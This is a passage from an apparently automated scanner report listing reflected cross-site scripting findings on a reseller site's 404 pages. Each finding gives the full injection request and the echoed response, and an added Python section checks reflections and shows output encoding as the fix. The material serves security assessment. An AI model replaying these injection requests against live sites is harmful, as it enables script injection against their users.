GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3f4db<a>3e7e2eb2ed0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3f4db<a>3e7e2eb2ed0&opt=2 was not found on this server.</p>
...[SNIP]...
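Every finding in this section has the same sink: the 404 page writes the requested URL into a <p> text node without HTML-encoding it. The "Certain" entries (2.3689 above, for example) reflect a complete <script> element; the "Firm" entries (2.3698 directly above) reflect a bare <a> tag through the same <p>, and the scanner simply did not follow up with a script probe on those query parameters. The Python below is an added example, not part of this report and not code from resellerbase.com: it reproduces the observed behaviour with a constructed 404 template modelled on the response bodies shown here, classifies whether a probe comes back raw or HTML-encoded, maps that result onto the Certain/Firm confidence levels the report uses, and shows the encoded output a fixed handler would produce. The report does not show the server-side code, so vulnerable_404 and hardened_404 are assumptions about what such a handler does.

```python
"""Added example: reflection check modelled on the 404 findings in this report.

The response template below is constructed from the response bodies shown in
the findings; the handlers are assumptions, since the report does not show the
scanned site's code.
"""
import html
import re

# Constructed 404 template, trimmed from the bodies shown above. The parts the
# report elides with ...[SNIP]... are not reproduced.
RAW_404 = (
    "HTTP/1.0 404 Not Found\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Error 404 - Page Not Found</title></head><body>\n"
    "<p>The requested URL {uri} was not found on this server.</p>\n"
    "</body></html>\n"
)


def split_response(raw: str) -> tuple[dict, str]:
    """Split a raw HTTP/1.x response into a header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def classify_reflection(body: str, marker: str) -> str:
    """'raw' if the probe is echoed unmodified, 'encoded' if it only appears
    HTML-escaped, 'absent' if it does not come back at all."""
    if marker in body:
        return "raw"
    if html.escape(marker, quote=True) in body or html.escape(marker, quote=False) in body:
        return "encoded"
    return "absent"


def confidence(marker: str, reflection: str) -> str:
    """Map a reflected probe onto the confidence levels the report uses:
    'Certain' when a <script> element survived intact in a text node,
    'Firm' when only a harmless tag such as <a> did, 'None' otherwise."""
    if reflection != "raw":
        return "None"
    if re.search(r"<script\b", marker, re.IGNORECASE):
        return "Certain"
    if re.search(r"<[a-z]", marker, re.IGNORECASE):
        return "Firm"
    return "None"


def vulnerable_404(request_uri: str) -> str:
    """Assumed handler reproducing the observed behaviour: the request URI is
    interpolated into the <p> text node with no output encoding."""
    return RAW_404.format(uri=request_uri)


def hardened_404(request_uri: str) -> str:
    """Same page with the URI HTML-escaped before it reaches the text node."""
    return RAW_404.format(uri=html.escape(request_uri, quote=True))


def check(handler, request_uri: str, marker: str) -> tuple[str, str]:
    """Run one probe through a handler and return (reflection, confidence)."""
    _, body = split_response(handler(request_uri))
    reflection = classify_reflection(body, marker)
    return reflection, confidence(marker, reflection)


if __name__ == "__main__":
    # Probe and path taken from finding 2.3689 above.
    script_probe = "cc25a<script>alert(1)</script>6e8ab6e8ee3"
    path = "/detail/8/themes/kosmos/images/rating/0.gif" + script_probe
    print(check(vulnerable_404, path, script_probe))   # ('raw', 'Certain')
    print(check(hardened_404, path, script_probe))     # ('encoded', 'None')
    # Probe from finding 2.3698 above: a bare tag, which the report rates Firm.
    tag_probe = "3f4db<a>3e7e2eb2ed0"
    query = "/detail/8/themes/kosmos/images/rating/search.php?Submit3=Search" + tag_probe
    print(check(vulnerable_404, query, tag_probe))     # ('raw', 'Firm')
```

To confirm a finding against the live host, swap the handler for a function that sends the request shown in the finding and returns the raw response; a marker that comes back "encoded" marks a false positive, while "raw" with an intact <script> element confirms it. One caveat the report does not state: the scanner sent literal < and > in the URL path and query, but browsers that follow the WHATWG URL standard percent-encode both characters before the request leaves the client, so whether a victim can be made to trigger this depends on whether the 404 handler URL-decodes the request URI before echoing it. Verify with a URL delivered through a browser, not only with the scanner's raw request.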

2.3699. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 96794<a>9c6a948740f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...96794<a>9c6a948740f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...96794<a>9c6a948740f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3700. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0495<script>alert(1)</script>4b4a641cba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0495<script>alert(1)</script>4b4a641cba5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0495<script>alert(1)</script>4b4a641cba5=1 was not found on this server.</p>
...[SNIP]...

2.3701. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f769d<a>fb13af5a55 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2f769d<a>fb13af5a55 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2f769d<a>fb13af5a55 was not found on this server.</p>
...[SNIP]...

2.3702. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload faeb6<script>alert(1)</script>64ba1d09836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfaeb6<script>alert(1)</script>64ba1d09836/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfaeb6<script>alert(1)</script>64ba1d09836/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3703. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1252<script>alert(1)</script>bec7def14c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8e1252<script>alert(1)</script>bec7def14c6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8e1252<script>alert(1)</script>bec7def14c6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3704. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 33b1a<script>alert(1)</script>38b886031cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes33b1a<script>alert(1)</script>38b886031cd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes33b1a<script>alert(1)</script>38b886031cd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3705. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1a746<script>alert(1)</script>a2bb570e476 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos1a746<script>alert(1)</script>a2bb570e476/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos1a746<script>alert(1)</script>a2bb570e476/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3706. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2abf7<script>alert(1)</script>448ca6af0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images2abf7<script>alert(1)</script>448ca6af0b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images2abf7<script>alert(1)</script>448ca6af0b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3707. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bad84<script>alert(1)</script>9a581ffc2b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/search.phpbad84<script>alert(1)</script>9a581ffc2b3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.phpbad84<script>alert(1)</script>9a581ffc2b3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3708. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd13f<a>6b02795c7d6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbd13f<a>6b02795c7d6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbd13f<a>6b02795c7d6&opt=2 was not found on this server.</p>
...[SNIP]...

2.3709. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c1b72<a>b811619def7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...c1b72<a>b811619def7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...c1b72<a>b811619def7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3710. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14dfc<script>alert(1)</script>757529b4736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&14dfc<script>alert(1)</script>757529b4736=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&14dfc<script>alert(1)</script>757529b4736=1 was not found on this server.</p>
...[SNIP]...

2.3711. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 34fbc<a>2d36973ec07 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=234fbc<a>2d36973ec07 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=234fbc<a>2d36973ec07 was not found on this server.</p>
...[SNIP]...

2.3712. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47ac4<script>alert(1)</script>40fbc94e125 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail47ac4<script>alert(1)</script>40fbc94e125/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail47ac4<script>alert(1)</script>40fbc94e125/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3713. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d140<script>alert(1)</script>74c3cfb5868 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/86d140<script>alert(1)</script>74c3cfb5868/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
